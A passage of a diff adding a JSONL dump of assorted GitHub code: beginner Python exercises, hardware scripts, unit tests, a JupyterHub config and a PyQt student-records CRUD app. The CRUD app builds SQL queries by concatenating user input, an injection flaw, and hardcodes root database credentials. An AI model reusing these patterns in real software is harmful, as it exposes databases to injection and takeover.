diff --git "a/2638.jsonl" "b/2638.jsonl" new file mode 100644--- /dev/null +++ "b/2638.jsonl" @@ -0,0 +1,1164 @@ +{"seq_id":"9431689437","text":"# Loan Calculator\n\"\"\"\nDay18 Challenge\ncreate a loan calculator that shows how much money you owe for a loan of $1,000 with a 5% APR (APR is fancy for Annual Percentage Rate) over 10 years.\nThis means each year the amount of money you owe will increase 5%.\nFigure out how much you owe altogether for 10 years?\nUse a for loop and one or two lines of looped code to determine the answer.\n\"\"\"\n\n\n\n\n\n\n\n\n\nprint(\"Loan Calculator\\n\")\nloan = float(input(\"Enter the amount : \"))\nintr = float(input(\"Enter the interest rate : \"))\nyear = int(input(\"Enter the number years : \"))\nloanx = loan\nfor i in range(1, year+1):\n x = float(loanx + (intr / 100) * loanx)\n print(f\"Year {i} is {x}\")\n loanx = x\ninterest = x - loan\nprint(f\"You paid {interest} in interest\")\n","repo_name":"RajatPatel1112/Python-100DaysOfCode","sub_path":"Day018-loan_calc.py","file_name":"Day018-loan_calc.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43588566910","text":"from turtle import Turtle\nimport random\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\nCAR_STARTING_POSITION = (0, -270)\n\n\nclass CarManager:\n def __init__(self):\n self.my_turtles = []\n\n\n\n\n def create_cars(self):\n rand_num = random.randint(1, 10)\n if rand_num == 1:\n new_car = Turtle()\n new_car.shape(\"square\")\n new_car.shapesize(stretch_wid=1, stretch_len=2)\n new_car.color(random.choice(COLORS))\n new_car.penup()\n new_car.setheading(180)\n random_y = random.randint(-240, 240)\n new_car.goto(300, random_y)\n self.my_turtles.append(new_car)\n\n\n def move(self):\n for car in self.my_turtles:\n car.forward(STARTING_MOVE_DISTANCE)\n","repo_name":"MannyHubGeek/turtle_crossing","sub_path":"car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7456995486","text":"import time\nimport board\nimport neopixel\nfrom digitalio import DigitalInOut, Direction, Pull\n\npixel_pin = board.D4\nnum_pixels = 51\nis_color_up = False\n\ndef color_up(color, wait):\n global is_color_up\n if not is_color_up:\n j = 50\n for i in range(25):\n pixels[i] = color\n pixels[j] = color\n time.sleep(wait)\n pixels.show()\n j= j - 1\n pixels[25] = color\n pixels.show()\n is_color_up = True\n #time.sleep(0.5)\n\ndef color_down(color, wait):\n global is_color_up\n if is_color_up:\n j = 0\n k = 50\n for i in range(25+1):\n pixels[k] = color\n pixels[j] = color\n time.sleep(wait)\n pixels.show()\n j = j + 1\n k = k -1\n is_color_up = False\n #pixels[25] = color\n #time.sleep(0.5)\n\npixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=1, auto_write=False)\n#for i in range(num_pixels):\n# pixels[i] = OFF\npixels.show()\nCYAN = (0, 255, 255)\nRED = (255, 0, 0)\nOFF = (0,0,0)\n\nswitch = DigitalInOut(board.D2)\nswitch.direction = Direction.INPUT\nswitch.pull = Pull.UP\n\n#pixels.fill(CYAN)\n#pixels.show()\n#time.sleep(0.01)\n\n#color_up(CYAN, 0.01)\n#color_down(OFF, 0.01)\n#sleep(0.3)\n\nwhile True:\n if switch.value:\n color_down(OFF, 0.01)\n #pixels.setBrightness(0.01)\n #pixels.fill(OFF)\n #pixels.show()\n #print(\"off\")\n else:\n #pixels.setBrightness(0.3)\n color_up(CYAN, 0.01)\n #pixels.fill(CYAN)\n #pixels.show()\n #print(\"on\")\n time.sleep(0.01)\n","repo_name":"Zarinie/Adventures-In-Cosplay","sub_path":"Lightsaber.py","file_name":"Lightsaber.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15129873482","text":"import unittest\n\nfrom libcloud.compute.drivers.ec2 import EC2NodeDriver, EC2USWestNodeDriver, NimbusNodeDriver, EucNodeDriver\n\nfrom epu.provisioner.sites import SiteDriver\n\ncredentials1 = {\n \"access_key\": \"myec2key\",\n \"secret_key\": \"myec2secret\",\n \"key_name\": \"myec2sshkeyname\"\n}\n\ncredentials2 = {\n \"access_key\": \"mynimbuskey\",\n \"secret_key\": \"mynimbussecret\",\n \"key_name\": \"mynimbussshkeyname\"\n}\n\ncredentials3 = {\n \"access_key\": \"myopenstackkey\",\n \"secret_key\": \"myopenstacksecret\",\n \"key_name\": \"myopenstacksshkeyname\"\n}\n\nsite_without_type = {\n \"host\": \"cloud.example.com\",\n \"port\": 4242\n}\n\nsite1 = {\n \"type\": \"ec2\",\n}\n\nsite2 = {\n \"type\": \"ec2\",\n \"region\": \"us-west-1\"\n}\n\nsite3 = {\n \"type\": \"nimbus\",\n \"host\": \"svc.uc.futuregrid.org\",\n \"port\": 8444\n}\n\nsite4 = {\n \"type\": \"openstack\",\n \"host\": \"149.165.146.50\",\n \"port\": 8773,\n \"secure\": False,\n \"path\": \"/services/Cloud\"\n\n}\n\n\nclass ProvisionerSitesTests(unittest.TestCase):\n def test_site_driver(self):\n # libcloud giving me grief (DL)\n import libcloud.security\n libcloud.security.VERIFY_SSL_CERT_STRICT = False\n\n try:\n SiteDriver(site_without_type, credentials1)\n except KeyError:\n pass\n else:\n self.fail(\"Expected exception\")\n\n ec2 = SiteDriver(site1, credentials1)\n ec2_west = SiteDriver(site2, credentials1)\n nimbus_test = SiteDriver(site3, credentials2)\n openstack_test = SiteDriver(site4, credentials3)\n\n # Test driver classes\n self.assertIsInstance(ec2.driver, EC2NodeDriver)\n self.assertIsInstance(ec2_west.driver, EC2USWestNodeDriver)\n self.assertIsInstance(nimbus_test.driver, NimbusNodeDriver)\n self.assertIsInstance(openstack_test.driver, EucNodeDriver)\n\n # Test hosts\n self.assertEqual(nimbus_test.driver.connection.host, \"svc.uc.futuregrid.org\")\n self.assertEqual(openstack_test.driver.connection.host, \"149.165.146.50\")\n\n # Test ports\n self.assertEqual(nimbus_test.driver.connection.port, 8444)\n self.assertEqual(openstack_test.driver.connection.port, 8773)\n\n # Test secure\n self.assertEqual(nimbus_test.driver.secure, True)\n self.assertEqual(openstack_test.driver.secure, False)\n\n # Test SSH keys\n self.assertEqual(ec2.driver.key, 'myec2key')\n self.assertEqual(ec2_west.driver.key, 'myec2key')\n self.assertEqual(nimbus_test.driver.key, 'mynimbuskey')\n self.assertEqual(openstack_test.driver.key, 'myopenstackkey')\n","repo_name":"ooici/epu","sub_path":"epu/provisioner/test/test_sites.py","file_name":"test_sites.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"27712827301","text":"import os\n\nc = get_config() # noqa: F821\n\n# We rely on environment variables to configure JupyterHub so that we\n# avoid having to rebuild the JupyterHub container every time we change a\n# configuration parameter.\n\n# Spawn single-user servers as Docker containers\nc.JupyterHub.spawner_class = \"dockerspawner.DockerSpawner\"\n\n# Spawn containers from this image\nc.DockerSpawner.image = os.environ[\"DOCKER_NOTEBOOK_IMAGE\"]\n\n# JupyterHub requires a single-user instance of the Notebook server, so we\n# default to using the `start-singleuser.sh` script included in the\n# jupyter/docker-stacks *-notebook images as the Docker run command when\n# spawning containers. Optionally, you can override the Docker run command\n# using the DOCKER_SPAWN_CMD environment variable.\nspawn_cmd = os.environ.get(\"DOCKER_SPAWN_CMD\", \"start-singleuser.sh\")\nc.DockerSpawner.cmd = spawn_cmd\n\n# Connect containers to this Docker network\nnetwork_name = os.environ[\"DOCKER_NETWORK_NAME\"]\nc.DockerSpawner.use_internal_ip = True\nc.DockerSpawner.network_name = network_name\n\n# Explicitly set notebook directory because we'll be mounting a volume to it.\n# Most `jupyter/docker-stacks` *-notebook images run the Notebook server as\n# user `jovyan`, and set the notebook directory to `/home/jovyan/work`.\n# We follow the same convention.\nnotebook_dir = os.environ.get(\"DOCKER_NOTEBOOK_DIR\", \"/home/jovyan/work\")\nc.DockerSpawner.notebook_dir = notebook_dir\n\n# Mount the real user's Docker volume on the host to the notebook user's\n# notebook directory in the container\nc.DockerSpawner.volumes = {\"jupyterhub-user-{username}\": notebook_dir}\n\n# Remove containers once they are stopped\nc.DockerSpawner.remove = True\n\n# For debugging arguments passed to spawned containers\nc.DockerSpawner.debug = True\n\n# User containers will access hub by container name on the Docker network\nc.JupyterHub.hub_ip = \"jupyterhub\"\nc.JupyterHub.hub_port = 8080\n\n# Persist hub data on volume mounted inside container\nc.JupyterHub.cookie_secret_file = \"/data/jupyterhub_cookie_secret\"\nc.JupyterHub.db_url = \"sqlite:////data/jupyterhub.sqlite\"\n\n# Authenticate users with Dummy authenticator - NOT FOR REAL LIFE USAGE!\nc.JupyterHub.authenticator_class = \"dummy\"\n\n# Allowed admins\nadmin = os.environ.get(\"JUPYTERHUB_ADMIN\")\nif admin:\n c.Authenticator.admin_users = [admin]\n","repo_name":"adamatics/let-the-right-one-in","sub_path":"jupyterhub-plain/jupyterhub_config.py","file_name":"jupyterhub_config.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"19972349518","text":"rows, cols = [int(x) for x in input().split()]\nmatrix = []\nbest_sum = -99999\nmax_row, max_col = 0, 0\n\nfor _ in range(rows):\n data = [int(x) for x in input().split()]\n matrix.append(data)\n\nfor row in range(rows - 2):\n for col in range(cols - 2):\n score = sum(matrix[row][col:col+3]) + sum(matrix[row+1][col:col+3]) + sum(matrix[row+2][col:col+3])\n if score > best_sum:\n best_sum = score\n max_row, max_col = row, col\n\nprint(f\"Sum = {best_sum}\")\nfor r in range(max_row, max_row+3):\n print(*matrix[r][max_col:max_col+3])","repo_name":"svgeesus/svgeesus.github.io","sub_path":"Multidimensional_list_exercises/03.Maximal_Sum.py","file_name":"03.Maximal_Sum.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"26668625791","text":"import tempfile\nimport unittest\nfrom pathlib import Path\n\nfrom pixano.data import COCOImporter, Dataset, DatasetInfo\n\n\nclass DatasetTestCase(unittest.TestCase):\n def setUp(self):\n # Create temporary directory\n self.temp_dir = tempfile.TemporaryDirectory()\n library_dir = Path(self.temp_dir.name)\n\n # Create a COCO dataset\n self.path = library_dir / \"coco\"\n input_dirs = {\n \"image\": Path(\"tests/assets/coco_dataset/image\"),\n \"objects\": Path(\"tests/assets/coco_dataset\"),\n }\n importer = COCOImporter(\n name=\"coco\",\n description=\"COCO dataset\",\n splits=[\"val\"],\n )\n self.dataset: Dataset = importer.import_dataset(\n input_dirs, self.path, copy=True\n )\n\n # Set dataset ID\n self.dataset.info.id = \"coco_dataset\"\n self.dataset.save_info()\n\n def tearDown(self) -> None:\n self.temp_dir.cleanup()\n\n def test_info_property(self):\n self.assertTrue(isinstance(self.dataset.info, DatasetInfo))\n self.assertEqual(self.dataset.info.id, \"coco_dataset\")\n\n def test_path_property(self):\n self.assertTrue(isinstance(self.dataset.path, Path))\n self.assertEqual(self.dataset.path, self.path)\n\n def test_media_dir_property(self):\n self.assertTrue(isinstance(self.dataset.media_dir, Path))\n self.assertEqual(self.dataset.media_dir, self.path / \"media\")\n\n def test_save_info(self):\n # Edit DatasetInfo\n self.dataset.info.id = \"coco_dataset_2\"\n self.dataset.save_info()\n\n updated_info = DatasetInfo.from_json(self.path / \"db.json\")\n self.assertEqual(updated_info.id, \"coco_dataset_2\")\n\n # Revert DatasetInfo back to normal\n self.dataset.info.id = \"coco_dataset\"\n self.dataset.save_info()\n\n updated_info = DatasetInfo.from_json(self.path / \"db.json\")\n self.assertEqual(updated_info.id, \"coco_dataset\")\n","repo_name":"pixano/pixano","sub_path":"tests/data/test_dataset.py","file_name":"test_dataset.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"31"} +{"seq_id":"33097020921","text":"# Novi Widia Damayanti - RPL XI-4\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QPushButton, QWidget\nimport pymysql\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n self.koneksi()\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(469, 265)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(40, 50, 111, 21))\n font = QtGui.QFont()\n font.setPointSize(10)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\n self.label_2.setGeometry(QtCore.QRect(40, 20, 111, 21))\n font = QtGui.QFont()\n font.setPointSize(10)\n font.setBold(True)\n font.setWeight(75)\n self.label_2.setFont(font)\n self.label_2.setObjectName(\"label_2\")\n self.label_3 = QtWidgets.QLabel(self.centralwidget)\n self.label_3.setGeometry(QtCore.QRect(40, 80, 111, 21))\n font = QtGui.QFont()\n font.setPointSize(10)\n font.setBold(True)\n font.setWeight(75)\n self.label_3.setFont(font)\n self.label_3.setObjectName(\"label_3\")\n self.simpan = QtWidgets.QPushButton(self.centralwidget)\n self.simpan.setGeometry(QtCore.QRect(40, 160, 75, 23))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(211, 211, 211))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)\n brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)\n brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)\n self.simpan.setPalette(palette)\n self.simpan.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.simpan.setDefault(False)\n self.simpan.setFlat(False)\n self.simpan.setObjectName(\"simpan\")\n self.simpan.clicked.connect(self.save)\n self.nis = QtWidgets.QLineEdit(self.centralwidget)\n self.nis.setGeometry(QtCore.QRect(110, 20, 161, 20))\n self.nis.setObjectName(\"nis\")\n self.nama = QtWidgets.QLineEdit(self.centralwidget)\n self.nama.setGeometry(QtCore.QRect(110, 50, 241, 20))\n self.nama.setObjectName(\"nama\")\n self.alamat = QtWidgets.QTextEdit(self.centralwidget)\n self.alamat.setGeometry(QtCore.QRect(110, 90, 241, 41))\n self.alamat.viewport().setProperty(\"cursor\", QtGui.QCursor(QtCore.Qt.IBeamCursor))\n self.alamat.setObjectName(\"alamat\")\n self.update = QtWidgets.QPushButton(self.centralwidget)\n self.update.setGeometry(QtCore.QRect(120, 160, 75, 23))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(211, 211, 211))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)\n brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)\n brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)\n self.update.setPalette(palette)\n self.update.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.update.setDefault(False)\n self.update.setFlat(False)\n self.update.setObjectName(\"update\")\n self.update.clicked.connect(self.ubah)\n self.hapus = QtWidgets.QPushButton(self.centralwidget)\n self.hapus.setGeometry(QtCore.QRect(200, 160, 75, 23))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(211, 211, 211))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)\n brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)\n brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)\n self.hapus.setPalette(palette)\n self.hapus.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.hapus.setDefault(False)\n self.hapus.setFlat(False)\n self.hapus.setObjectName(\"hapus\")\n self.hapus.clicked.connect(self.delete)\n self.clear = QtWidgets.QPushButton(self.centralwidget)\n self.clear.setGeometry(QtCore.QRect(280, 160, 75, 23))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(211, 211, 211))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)\n brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)\n brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)\n self.clear.setPalette(palette)\n self.clear.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.clear.setDefault(False)\n self.clear.setFlat(False)\n self.clear.setObjectName(\"clear\")\n self.clear.clicked.connect(self.bersih)\n self.check = QtWidgets.QPushButton(self.centralwidget)\n self.check.setGeometry(QtCore.QRect(280, 20, 71, 23))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(211, 211, 211))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)\n brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)\n brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)\n self.check.setPalette(palette)\n self.check.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.check.setDefault(False)\n self.check.setFlat(False)\n self.check.setObjectName(\"check\")\n self.check.clicked.connect(self.tampil)\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 469, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.label.setText(_translate(\"MainWindow\", \"Nama\"))\n self.label_2.setText(_translate(\"MainWindow\", \"NIS\"))\n self.label_3.setText(_translate(\"MainWindow\", \"Alamat\"))\n self.simpan.setText(_translate(\"MainWindow\", \"Simpan\"))\n self.update.setText(_translate(\"MainWindow\", \"Update\"))\n self.hapus.setText(_translate(\"MainWindow\", \"Hapus\"))\n self.clear.setText(_translate(\"MainWindow\", \"Clear\"))\n self.check.setText(_translate(\"MainWindow\", \"Check\"))\n\n def koneksi(self):\n con = pymysql.connect(db='db_python', user='root', passwd='root', host='localhost', port=3306, autocommit=True)\n cur = con.cursor()\n if(cur):\n self.messagebox(\"Koneksi\", \"Koneksi Berhasil\")\n else:\n self.messagebox(\"Koneksi\", \"Koneksi Gagal\")\n\n def messagebox(self, title, message):\n mess = QtWidgets.QMessageBox()\n mess.setWindowTitle(title)\n mess.setText(message)\n mess.setStandardButtons(QtWidgets.QMessageBox.Ok)\n mess.exec_()\n\n def save(self):\n nis = self.nis.text()\n nama = self.nama.text()\n alamat = self.alamat.toPlainText()\n insert = (nis,nama,alamat)\n print(insert)\n con = pymysql.connect(db='db_python', user='root', passwd='root', host='localhost', port=3306, autocommit=True)\n cur = con.cursor()\n sql = \"INSERT INTO siswa(nis,nama,alamat)\" + \"VALUES\" + str(insert)\n data = cur.execute(sql)\n if(data):\n self.messagebox(\"SUKSES\", \"Data Siswa Tersimpan\")\n else:\n self.messagebox(\"GAGAL\", \"Data Siswa Gagal Tersimpan\")\n\n def tampil(self):\n nis = self.nis.text()\n con = pymysql.connect(db='db_python', user='root', passwd='root', host='localhost', port=3306, autocommit=True)\n cur = con.cursor()\n cur.execute(\"SELECT * FROM siswa WHERE nis='\"+str(nis)+\"'\")\n data = cur.fetchall()\n if(data):\n for tp in data:\n self.nis.setText(\"\"+tp[0])\n self.nama.setText(\"\"+tp[1])\n self.alamat.setText(\"\"+tp[2])\n self.messagebox(\"INFO\",\"Ini Adalah Data Anda\")\n else:\n self.messagebox(\"INFO\",\"Data Belum Ada\")\n\n def ubah(self):\n nis = self.nis.text()\n nama = self.nama.text()\n alamat = self.alamat.toPlainText()\n insert = (nis,nama,alamat)\n print(insert)\n con = pymysql.connect(db='db_python', user='root', passwd='root', host='localhost', port=3306, autocommit=True)\n cur = con.cursor()\n sql = \"UPDATE siswa SET nama=%s, alamat=%s WHERE nis=%s\"\n data = cur.execute(sql, (nama,alamat,nis))\n if(data):\n self.messagebox(\"SUKSES\", \"Data Berhasil Di Update\")\n else:\n self.messagebox(\"Gagal\", \"Data Gagal Di Update\")\n\n def delete(self):\n nis = self.nis.text()\n nama = self.nama.text()\n alamat = self.alamat.toPlainText()\n insert = (nis,nama,alamat)\n print(insert)\n con = pymysql.connect(db='db_python', user='root', passwd='root', host='localhost', port=3306, autocommit=True)\n cur = con.cursor()\n sql = \"DELETE FROM siswa WHERE nis=%s\"\n data = cur.execute(sql, (nis))\n if(data):\n self.messagebox(\"SUKSES\", \"Data Berhasil Di Hapus\")\n else:\n self.messagebox(\"Gagal\", \"Data Gagal Di Hapus\")\n\n def bersih(self):\n self.nis.clear()\n self.nama.clear()\n self.alamat.clear()\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n\n# 19 Desember 2018","repo_name":"noviwdd/Python","sub_path":"11706286_Novi Widia Damayanti_RPL XI-4/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":11229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"28796964374","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.previous = None\n\nclass DoubleLinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def __str__(self):\n if self.isEmpty():\n return \"\"\n current = self.head\n elements = []\n while current:\n elements.append(str(current.data))\n current = current.next\n return \"->\".join(elements)\n\n def str_reverse(self):\n if self.isEmpty():\n return \"\"\n current = self.tail\n elements = []\n while current:\n elements.append(str(current.data))\n current = current.previous\n return \"->\".join(elements)\n\n def isEmpty(self):\n return self.head is None\n\n def append(self, data):\n new_node = Node(data)\n if self.isEmpty():\n self.head = new_node\n self.tail = new_node\n else:\n new_node.previous = self.tail\n self.tail.next = new_node\n self.tail = new_node\n\n def insert(self, index, data):\n if index < 0:\n raise ValueError(\"Index cannot be negative\")\n if index == 0:\n new_node = Node(data)\n new_node.next = self.head\n if self.head:\n self.head.previous = new_node\n self.head = new_node\n if not self.tail:\n self.tail = new_node\n else:\n current = self.head\n counter = 0\n while current:\n if counter == index - 1:\n new_node = Node(data)\n new_node.next = current.next\n new_node.previous = current\n if current.next:\n current.next.previous = new_node\n current.next = new_node\n if not new_node.next:\n self.tail = new_node\n break\n current = current.next\n counter += 1\n\n def find_index(self, data):\n current = self.head\n index = 0\n while current:\n if current.data == data:\n return index\n current = current.next\n index += 1\n return -1\n\n def remove(self, data):\n current = self.head\n while current:\n if current.data == data:\n index = self.find_index(data)\n if current.previous:\n current.previous.next = current.next\n else:\n self.head = current.next\n\n if current.next:\n current.next.previous = current.previous\n else:\n self.tail = current.previous\n\n return f\"removed : {data} from index : {index}\"\n current = current.next\n return \"Not Found!\"\n \n def index_exists(self, index):\n if index == 0:\n return True\n\n current_node = self.head\n current_index = 0\n while current_node is not None:\n if current_index == index:\n return True\n current_node = current_node.next\n current_index += 1\n\n return False\n \n def length(self):\n current = self.head\n count = 0\n while current:\n count += 1\n current = current.next\n return count\n\ndll = DoubleLinkedList()\ninp = input(\"Enter Input : \").split(\",\")\nfor element in inp:\n if element[0] == ' ':\n element = element[1:]\n x = element.split(\" \")\n if x[0] == 'A':\n dll.append(x[1])\n elif x[0] == \"Ab\":\n dll.insert(0, x[1])\n elif x[0] == 'I':\n data = x[1].split(\":\")\n if int(data[0]) == dll.length():\n dll.append(data[1])\n print(f\"index = {data[0]} and data = {data[1]}\")\n elif not dll.index_exists(int(data[0])):\n print(\"Data cannot be added\")\n else:\n dll.insert(int(data[0]), data[1])\n print(f\"index = {data[0]} and data = {data[1]}\")\n else:\n print(dll.remove(x[1]))\n print(f\"linked list : {dll}\\nreverse : {dll.str_reverse()}\")","repo_name":"poohpoom2002/OOD","sub_path":"Lab-5_2.py","file_name":"Lab-5_2.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3878313557","text":"import numpy as np\nimport pytest\n\nfrom rocketpy import Function\nfrom rocketpy.mathutils import Vector\n\ntest_vector_1 = [1, 2, 3]\ntest_vector_2 = [-np.pi, 1, np.e]\ntest_vector_3 = [3 * 1j, -2j, 0j]\ntest_vectors = [test_vector_1, test_vector_2, test_vector_3]\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_constructor(vector_components):\n vector = Vector(vector_components)\n assert vector.components == vector_components\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_get_item(vector_components):\n vector = Vector(vector_components)\n for i in range(3):\n assert vector[i] == vector_components[i]\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_iter(vector_components):\n vector = Vector(vector_components)\n for i, j in zip(vector, vector_components):\n assert i == j\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_call(vector_components):\n f = Function(lambda x: x**2)\n vector = Vector(vector_components)\n callable_vector = vector * f\n assert callable_vector(1) == vector\n assert callable_vector(2) == 4 * vector\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_len(vector_components):\n vector = Vector(vector_components)\n assert len(vector) == 3\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_x_y_z(vector_components):\n vector = Vector(vector_components)\n assert vector.x == vector_components[0]\n assert vector.y == vector_components[1]\n assert vector.z == vector_components[2]\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_unit_vector(vector_components):\n vector = Vector(vector_components)\n unit_vector = vector.unit_vector\n assert pytest.approx(abs(unit_vector)) == 1\n assert unit_vector.is_parallel_to(vector)\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_cross_matrix(vector_components):\n vector = Vector(vector_components)\n cross_matrix = vector.cross_matrix\n assert cross_matrix.transpose == -cross_matrix\n assert cross_matrix.trace == 0\n assert cross_matrix @ vector == Vector.zeros()\n assert cross_matrix @ Vector.i() == vector ^ Vector.i()\n assert cross_matrix @ Vector.j() == vector ^ Vector.j()\n assert cross_matrix @ Vector.k() == vector ^ Vector.k()\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_abs(vector_components):\n vector = Vector(vector_components)\n vector_magnitude = abs(vector)\n assert vector_magnitude == sum([i**2 for i in vector_components]) ** 0.5\n\n\n@pytest.mark.parametrize(\"vector_components\", test_vectors)\ndef test_vector_neg(vector_components):\n vector = Vector(vector_components)\n neg_vector = Vector([-i for i in vector_components])\n assert neg_vector == -vector\n\n\n@pytest.mark.parametrize(\"u_c\", test_vectors)\n@pytest.mark.parametrize(\"v_c\", test_vectors)\ndef test_vector_add(u_c, v_c):\n u, v = Vector(u_c), Vector(v_c)\n result = u + v\n assert result == Vector([i + j for i, j in zip(u_c, v_c)])\n\n\n@pytest.mark.parametrize(\"u_c\", test_vectors)\n@pytest.mark.parametrize(\"v_c\", test_vectors)\ndef test_vector_sub(u_c, v_c):\n u, v = Vector(u_c), Vector(v_c)\n result = u - v\n assert result == Vector([i - j for i, j in zip(u_c, v_c)])\n\n\n@pytest.mark.parametrize(\"k\", [-1, 0, 1, np.pi, -1, 1])\n@pytest.mark.parametrize(\"u_c\", test_vectors)\ndef test_vector_mul(k, u_c):\n u = Vector(u_c)\n result = u * k\n assert result == Vector([k * i for i in u_c])\n\n\n@pytest.mark.parametrize(\"k\", [-1, 0, 1, np.pi, -1, 1])\n@pytest.mark.parametrize(\"u_c\", test_vectors)\ndef test_vector_rmul(k, u_c):\n u = Vector(u_c)\n result = k * u\n assert result == Vector([k * i for i in 